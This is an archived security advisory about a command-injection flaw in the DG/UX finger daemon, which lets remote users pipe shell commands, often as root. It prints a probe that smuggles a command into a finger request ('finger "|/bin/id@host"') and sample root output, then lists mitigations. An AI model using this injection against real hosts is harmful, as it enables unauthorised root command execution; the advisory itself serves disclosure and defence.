Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Unix :: General :: finger-3.htm

In.fingerd for dgux has the same old finger daemon bug





    George Imburgia posted about another old bug that won't die.   The
    finger daemon  that ships  with dgux  will allow  a remote user to
    pipe commands, often with uid root or bin.

    To  check  for  this  vulnerability,  simply use the RFC compliant

        finger /W@host

    If it returns something like this, it may be vulnerable;

        Login name: /W                          In real life: ???

    To see the uid in.fingerd is running as, try this;

        finger "|/bin/id@host"

    Often, you will see something like this;

        uid=0(root) gid=0(root)


        uid=2(bin) gid=2(bin) groups=2(bin),3(sys),5(mail)


    1) disable fingerd,
    2) use  tcpwrappers,  and  have  a  wrapper program check for  the
       offending pipe and other shell specials,
    3) find  a third  party fingerd  that DOESN'T  have this wide open
       door to root.

    Apparently it's fixed in MU03.  DG/UX is officially up to 4.11MU04
    with 4.20 coming soon.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH